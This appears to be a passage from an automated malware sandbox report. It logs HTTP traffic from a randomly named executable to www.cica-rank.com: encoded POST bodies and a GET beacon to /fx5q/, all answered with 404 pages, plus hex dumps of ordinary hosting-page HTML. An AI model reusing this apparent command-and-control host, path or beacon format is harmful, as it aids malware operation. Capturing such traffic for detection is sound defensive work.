                                          Data Ascii: feb2<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server27.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57px [TRUNCATED]
                                          May 27, 2024 12:43:43.025777102 CEST1236INData Raw: 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74
                                          Data Ascii: x Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_
                                          May 27, 2024 12:43:43.025794983 CEST1236INData Raw: 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 6d 6f 62 69 6c 65 2d 6f 76 65 72 66 6c 6f 77 5f 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d
                                          Data Ascii: a (min-width:1024px){.is_adaptive .b-page_mobile-overflow_hidden{overflow:visible}}.ie .b-page{display:block}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b-
                                          May 27, 2024 12:43:43.025865078 CEST1236INData Raw: 6f 6e 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 20 2d 31 35 70 78 20 30 20 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 5f 61 64
                                          Data Ascii: on{padding:0;margin:0 -15px 0 0}@media (min-width:1024px){.is_adaptive .b-page__addition{padding:0;margin:0 -15px 0 0}}.b-page__addition-wrapper{min-width:320px;padding:0;background-color:#f2f4f9}html:not(.is_adaptive) .b-page__addition-wrappe
                                          May 27, 2024 12:43:43.025882006 CEST1236INData Raw: 6c 65 7b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 36 34 33 36 34 20 74 72 61 6e 73 70 61 72 65 6e 74 20 63 75 72 72 65 6e 74 63 6f 6c 6f 72 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c
                                          Data Ascii: le{width:0;height:0;border-color:#364364 transparent currentcolor;border-style:solid solid none;border-width:4px 4px 0;display:inline-block;vertical-align:middle}.b-page__anno-container{z-index:auto}.b-page_overflow_visible,html:not(.is_adapti
                                          May 27, 2024 12:43:43.025897980 CEST1236INData Raw: 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 2d 63 6f 6d 70 61 63 74 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 7b 6d 61 72 67 69
                                          Data Ascii: xt_size_giant-compact.b-text_margin_top,.b-text_size_giant.b-text_margin_top{margin-top:84px}.b-text_size_giant-compact{font:72px/78px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.b-text_size_huge{font:48px/60px
                                          May 27, 2024 12:43:43.027430058 CEST1236INData Raw: 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 30 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 2e 62 2d
                                          Data Ascii: ue,Helvetica,FreeSans,sans-serif;margin-bottom:30px}.b-text_size_medium-compact.b-text_margin_top,.b-text_size_medium.b-text_margin_top{margin-top:30px}.b-text_size_medium-compact{font:20px/24px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sa
                                          May 27, 2024 12:43:43.027462959 CEST1236INData Raw: 67 69 6e 5f 74 6f 70 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 34 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70
                                          Data Ascii: gin_top{margin-top:84px}html:not(.is_adaptive) .b-text_size_giant-compact\@desktop{font:72px/78px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_huge\@desktop{font:48px/60px Inte
                                          May 27, 2024 12:43:43.027481079 CEST1236INData Raw: 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78
                                          Data Ascii: b-text_size_large-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_large\@desktop.b-text_margin_top{margin-top:36px}html:not(.is_adaptive) .b-text_size_large-compact\@desktop{font:24px/30px Inter,Arial,Helvetica Neue,Helv
                                          May 27, 2024 12:43:43.027520895 CEST1236INData Raw: 69 7a 65 5f 73 6d 61 6c 6c 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 31 32 70 78 2f 31 38 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61
                                          Data Ascii: ize_small\@desktop{font:12px/18px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:18px}html:not(.is_adaptive) .b-text_size_small-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_small\@desktop.b-tex
                                          May 27, 2024 12:43:43.032989025 CEST1236INData Raw: 73 6b 74 6f 70 7b 66 6f 6e 74 3a 34 38 70 78 2f 35 34 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67
                                          Data Ascii: sktop{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}.is_adaptive .b-text_size_big\@desktop{font:32px/42px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:42px}.is_adaptive .b-


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.549728183.181.79.111806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:49.064804077 CEST759OUTPOST /fx5q/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Origin: http://www.cica-rank.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.cica-rank.com/fx5q/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 30 2b 62 33 66 75 4e 6a 48 44 37 58 30 59 54 62 46 6e 37 2b 4f 6d 54 73 63 2b 72 70 4e 31 56 34 67 31 51 64 72 51 78 38 2f 61 62 61 7a 31 64 76 44 4b 73 58 55 4e 77 58 58 2f 50 53 53 6d 6a 72 55 78 46 51 64 43 72 68 66 64 68 4b 6d 35 46 51 5a 4d 53 4e 7a 46 72 58 47 4c 6a 47 78 4d 30 67 72 71 67 6f 2f 63 65 44 33 52 62 2f 76 7a 50 53 57 35 79 37 34 37 6d 65 73 75 57 7a 37 31 4b 61 68 6c 67 64 4c 35 4d 2f 63 73 52 61 63 39 6f 30 66 61 2b 36 34 49 7a 62 67 73 68 6c 34 55 58 78 77 49 62 4c 39 5a 31 31 76 36 2f 4d 6b 64 35 6a 66 45 5a 66 6c 4f 66 32 4e 76 59 46 61 75 73 79 37 77 34 61 71 4a 41 3d
                                          Data Ascii: 4b34ht=0+b3fuNjHD7X0YTbFn7+OmTsc+rpN1V4g1QdrQx8/abaz1dvDKsXUNwXX/PSSmjrUxFQdCrhfdhKm5FQZMSNzFrXGLjGxM0grqgo/ceD3Rb/vzPSW5y747mesuWz71KahlgdL5M/csRac9o0fa+64Izbgshl4UXxwIbL9Z11v6/Mkd5jfEZflOf2NvYFausy7w4aqJA=
                                          May 27, 2024 12:43:49.870877981 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: W/"afe-58196ac9aed38"
                                          Content-Encoding: br
                                          Data Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 [TRUNCATED]
                                          Data Ascii: 513W|]4c!u6cl|},&LHsXVZ!>:!~hW~V!\twoavHk(KN0$E(8MOR-61SK_+mt]xWO*>bpDtZ3}D>1rZxGbSV,H+"VLq#KIh2d+/wg?Y["LR[w<(ct)""c!Pb)F3Y.%LSP}ey}4@B.geJQ"tL"M.rB&"G6K<$H\(V{A( -$a|6mW)xb;5f']X!UB\l~3gkslB&~d0!C7Y%fD?q&Sd6wjCgBH\l(\Xt58%@ZoNXK9GnPz0JJ9PM{T(UMO}%Q2TTl$0!N\rAVAH@WiHWIP1$?i[Q"Ez.V]R4ITGVYl=@SYig@l90KsPk;&l~B#F@><(@D&L|y.I?QoaP(00vCTX+BOW#H=@&JfNTx28i:`^gf\3{\}s HGF\^r*GYH^|k3F
                                          May 27, 2024 12:43:49.870944977 CEST345INData Raw: 00 85 15 ce e2 69 5a 85 d2 a4 e2 26 aa 4d aa 54 b6 aa 5e b3 3d fb f7 b7 e8 23 cf fe 2b b2 2b f2 02 19 0d 7c e4 45 ac 07 2c 6a e1 80 e4 14 fb eb 6e 9d 17 3b be 97 a7 44 f8 b5 72 cd b3 3f f9 5e 90 81 6d d2 1f 00 fe a4 38 b1 73 5f dd 8b 2b be 59 36
                                          Data Ascii: iZ&MT^=#++|E,jn;Dr?^m8s_+Y6O>z95[~W>;RFc+1jS9<6g]rgP}~vXoS={v:kOwM[W_L_81t%h.]>&zhF


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.549729183.181.79.111806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:52.094096899 CEST779OUTPOST /fx5q/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Origin: http://www.cica-rank.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.cica-rank.com/fx5q/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 30 2b 62 33 66 75 4e 6a 48 44 37 58 33 34 6a 62 48 45 6a 2b 66 32 54 72 43 75 72 70 48 56 56 30 67 31 63 64 72 52 31 53 2f 4d 6a 61 79 55 74 76 43 4c 73 58 61 74 77 58 66 66 50 58 57 6d 6a 77 55 78 49 6e 64 41 76 68 66 64 31 4b 6d 38 42 51 5a 2f 4b 4b 79 56 72 5a 4b 72 6a 49 76 38 30 67 72 71 67 6f 2f 63 4b 35 33 51 7a 2f 75 44 66 53 55 64 6d 36 6a 62 6d 64 72 75 57 7a 78 6c 4c 54 68 6c 67 76 4c 34 67 46 63 75 5a 61 63 34 4d 30 66 4c 2b 6c 79 49 79 65 76 4d 67 61 33 30 57 6e 36 36 4c 33 30 50 34 4a 37 4d 6e 74 6c 72 55 4a 46 6d 52 33 32 75 7a 4f 64 38 51 79 4c 65 4e 62 68 54 6f 71 30 65 56 76 58 4c 79 59 63 52 4a 32 54 52 56 31 67 68 37 51 68 56 6f 7a
                                          Data Ascii: 4b34ht=0+b3fuNjHD7X34jbHEj+f2TrCurpHVV0g1cdrR1S/MjayUtvCLsXatwXffPXWmjwUxIndAvhfd1Km8BQZ/KKyVrZKrjIv80grqgo/cK53Qz/uDfSUdm6jbmdruWzxlLThlgvL4gFcuZac4M0fL+lyIyevMga30Wn66L30P4J7MntlrUJFmR32uzOd8QyLeNbhToq0eVvXLyYcRJ2TRV1gh7QhVoz
                                          May 27, 2024 12:43:52.912378073 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: W/"afe-58196ac9aed38"
                                          Content-Encoding: br
                                          Data Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 [TRUNCATED]
                                          Data Ascii: 513W|]4c!u6cl|},&LHsXVZ!>:!~hW~V!\twoavHk(KN0$E(8MOR-61SK_+mt]xWO*>bpDtZ3}D>1rZxGbSV,H+"VLq#KIh2d+/wg?Y["LR[w<(ct)""c!Pb)F3Y.%LSP}ey}4@B.geJQ"tL"M.rB&"G6K<$H\(V{A( -$a|6mW)xb;5f']X!UB\l~3gkslB&~d0!C7Y%fD?q&Sd6wjCgBH\l(\Xt58%@ZoNXK9GnPz0JJ9PM{T(UMO}%Q2TTl$0!N\rAVAH@WiHWIP1$?i[Q"Ez.V]R4ITGVYl=@SYig@l90KsPk;&l~B#F@><(@D&L|y.I?QoaP(00vCTX+BOW#H=@&JfNTx28i:`^gf\3{\}s HGF\^r*GYH^|k3F
                                          May 27, 2024 12:43:52.912410021 CEST345INData Raw: 00 85 15 ce e2 69 5a 85 d2 a4 e2 26 aa 4d aa 54 b6 aa 5e b3 3d fb f7 b7 e8 23 cf fe 2b b2 2b f2 02 19 0d 7c e4 45 ac 07 2c 6a e1 80 e4 14 fb eb 6e 9d 17 3b be 97 a7 44 f8 b5 72 cd b3 3f f9 5e 90 81 6d d2 1f 00 fe a4 38 b1 73 5f dd 8b 2b be 59 36
                                          Data Ascii: iZ&MT^=#++|E,jn;Dr?^m8s_+Y6O>z95[~W>;RFc+1jS9<6g]rgP}~vXoS={v:kOwM[W_L_81t%h.]>&zhF


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.549730183.181.79.111806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:54.625272036 CEST1796OUTPOST /fx5q/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Origin: http://www.cica-rank.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.cica-rank.com/fx5q/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 30 2b 62 33 66 75 4e 6a 48 44 37 58 33 34 6a 62 48 45 6a 2b 66 32 54 72 43 75 72 70 48 56 56 30 67 31 63 64 72 52 31 53 2f 4d 72 61 7a 6d 56 76 44 6f 55 58 5a 74 77 58 44 50 50 57 57 6d 6a 39 55 78 67 72 64 41 7a 78 66 65 4e 4b 6d 65 4a 51 66 4b 6d 4b 38 56 72 5a 43 4c 6a 46 78 4d 31 30 72 71 77 73 2f 63 61 35 33 51 7a 2f 75 46 54 53 51 4a 79 36 68 62 6d 65 73 75 57 2f 37 31 4b 32 68 6b 4a 59 4c 34 55 56 64 65 35 61 63 59 63 30 4d 4e 71 6c 78 6f 79 63 6a 73 67 43 33 30 62 35 36 36 57 62 30 50 6b 33 37 4c 4c 74 6b 66 35 41 41 6c 4e 54 74 75 65 6a 50 76 51 71 66 4b 56 70 6a 77 67 41 72 4f 51 56 63 4b 79 79 66 33 78 77 48 52 41 34 6a 6c 54 77 6e 53 70 6e 65 46 38 6c 65 71 2f 30 70 38 30 61 4e 2b 77 6a 37 76 44 79 70 74 2b 57 33 76 67 72 6e 6f 54 75 4e 6d 55 63 58 34 6f 57 4f 39 4e 34 47 6d 63 36 4e 35 66 45 78 32 71 4c 49 71 56 39 7a 75 55 65 2b 34 46 76 56 6b 78 47 4c 57 78 42 58 4e 6a 31 59 75 54 65 72 59 50 41 35 57 75 70 4e 54 4b 70 39 2b 6f 76 66 4f 78 69 5a 69 54 41 51 79 79 [TRUNCATED]
                                          Data Ascii: 4b34ht=0+b3fuNjHD7X34jbHEj+f2TrCurpHVV0g1cdrR1S/MrazmVvDoUXZtwXDPPWWmj9UxgrdAzxfeNKmeJQfKmK8VrZCLjFxM10rqws/ca53Qz/uFTSQJy6hbmesuW/71K2hkJYL4UVde5acYc0MNqlxoycjsgC30b566Wb0Pk37LLtkf5AAlNTtuejPvQqfKVpjwgArOQVcKyyf3xwHRA4jlTwnSpneF8leq/0p80aN+wj7vDypt+W3vgrnoTuNmUcX4oWO9N4Gmc6N5fEx2qLIqV9zuUe+4FvVkxGLWxBXNj1YuTerYPA5WupNTKp9+ovfOxiZiTAQyyQuUGdUla0JzVmxKT4CGiTde2nWIMOaAlnByHmeHfJu4Uyk8gL9/tIluiFsuor9KMpjiiE+npxY8VEuvGP4xxXO/S8zyNewKAhxXmhIyFdSBcAK8omLH53Wqbikj1OmlI4ie1OYO0tk4DKjs303kkHLfDKVTIIth9tZhbVhAv0P0gwDTrbNt18I309yM8exJcxj8fBifCB7S4WIQJ40yNOUu2FuJ5R9+taihO5WAbpxZCtl9Z0iSFWlMXzmpPz+chOD4/XaOFX0w5s2cdaKKuK6cbsZ4OUzTWFHJDFfcfSKbZRblRAOiH7oxIbcmkowm6Axs7yH0EHZJrmvPUeyXZ/FqT1nq+djwqNK/wE4CbgSuN4lAALHxQxWB7IUx+7KYxdzqYaFb3Q6v0IWf1ObsqVrN1YUBn/K184kWPrFCo1vl2hQeHNO/oLhPc4Gda/LfKfFBqOnfZn1L29xgpHc0AuHXWsc19ebHc9lQRUSG/k60h/45AwZt3NkUR6dOeA1PMzPObtJory6T3I3pPYZmRdSCSgoXUnhX7qgYWb9tK/eDA7NlSkI0LOCFAo02P+av+oF03EBGfv+BeAKH3gzGN7kLLQyvam38yAZZWx7dTtMX5LrAWi6N+0mm/XJWf0N4BYKNrIlBAHTSI31SMe/r8wCLApxUXZdYQcq [TRUNCATED]
                                          May 27, 2024 12:43:55.487293005 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: W/"afe-58196ac9aed38"
                                          Content-Encoding: br
                                          Data Raw: 35 31 33 0d 0a c1 e8 57 00 00 bf bd a8 fb ce fd 7c bd 5d 84 c4 aa b8 8e 93 34 19 8e 63 21 75 ed 36 e8 d6 aa 63 6c 7c a1 b3 7d 89 8f 9d ef 2c fb 92 26 4c f9 fb 48 73 87 06 ad 58 b5 56 b4 a5 9d 8a e8 04 a5 b0 8e 81 5a 21 3e 3a 21 7e 68 57 7e 56 21 f1 af f9 eb e2 5c b3 06 cd c6 74 77 6f 61 0c c3 76 48 9f 6b b3 28 4b 4e b8 9f 30 c5 f0 c1 24 08 a2 45 b0 28 86 38 4d 82 86 0f 96 4f d0 52 2d 36 31 19 0c 06 53 4b aa 13 d9 81 5f 0e 9e 2b b8 b5 6d 9a 74 ea 5d 78 57 ae cf 4f 7f f4 c9 c2 0c c4 2a e1 3e f2 62 95 70 e0 44 74 5a f8 33 82 7d e4 c5 94 44 3e f2 12 aa 08 84 31 c9 72 aa 5a 78 e6 de b4 f5 c1 02 06 db 47 9e 62 8a 53 bf 56 ae c1 2c e3 14 ee 48 05 b3 b2 2b 22 cf 56 4c 71 ea 23 ff 4b 04 49 68 0b 87 32 1d 64 ac 13 2b 0c a1 14 8a 0a d5 c2 d3 e3 2f 80 07 77 67 16 3f 9e 59 84 5b 22 9c c4 f7 cc 4c 06 52 e5 e7 d2 5b 77 ae cf 3c 28 cd ce cf cd cd df 07 c3 a6 9a d7 63 74 29 95 d9 1e bf c4 22 15 b7 22 da 63 21 b5 06 be 50 62 82 29 46 b8 95 87 84 d3 96 33 59 2e 25 4c b0 a4 9b 8c de 16 fb c8 cb d5 80 53 50 83 94 b6 b0 [TRUNCATED]
                                          Data Ascii: 513W|]4c!u6cl|},&LHsXVZ!>:!~hW~V!\twoavHk(KN0$E(8MOR-61SK_+mt]xWO*>bpDtZ3}D>1rZxGbSV,H+"VLq#KIh2d+/wg?Y["LR[w<(ct)""c!Pb)F3Y.%LSP}ey}4@B.geJQ"tL"M.rB&"G6K<$H\(V{A( -$a|6mW)xb;5f']X!UB\l~3gkslB&~d0!C7Y%fD?q&Sd6wjCgBH\l(\Xt58%@ZoNXK9GnPz0JJ9PM{T(UMO}%Q2TTl$0!N\rAVAH@WiHWIP1$?i[Q"Ez.V]R4ITGVYl=@SYig@l90KsPk;&l~B#F@><(@D&L|y.I?QoaP(00vCTX+BOW#H=@&JfNTx28i:`^gf\3{\}s HGF\^r*GYH^|k3F
                                          May 27, 2024 12:43:55.487384081 CEST345INData Raw: 00 85 15 ce e2 69 5a 85 d2 a4 e2 26 aa 4d aa 54 b6 aa 5e b3 3d fb f7 b7 e8 23 cf fe 2b b2 2b f2 02 19 0d 7c e4 45 ac 07 2c 6a e1 80 e4 14 fb eb 6e 9d 17 3b be 97 a7 44 f8 b5 72 cd b3 3f f9 5e 90 81 6d d2 1f 00 fe a4 38 b1 73 5f dd 8b 2b be 59 36
                                          Data Ascii: iZ&MT^=#++|E,jn;Dr?^m8s_+Y6O>z95[~W>;RFc+1jS9<6g]rgP}~vXoS={v:kOwM[W_L_81t%h.]>&zhF


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.549731183.181.79.111806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:57.157571077 CEST504OUTGET /fx5q/?4b34ht=58zXcaw4QDLVkaL+G0qZOwfYBtfLZlBf9k0Qnw1Zv4bR0GQyFI5ORfMwVsCUT1zQejwif13gDfh0mdA+c9yRzCT9PqSg1LoC16c3+fSR0wz9mE2aSN+j+I+5sdCG7jTd0Q==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:57.961004972 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:57 GMT
                                          Content-Type: text/html
                                          Content-Length: 2814
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: "afe-58196ac9aed38"
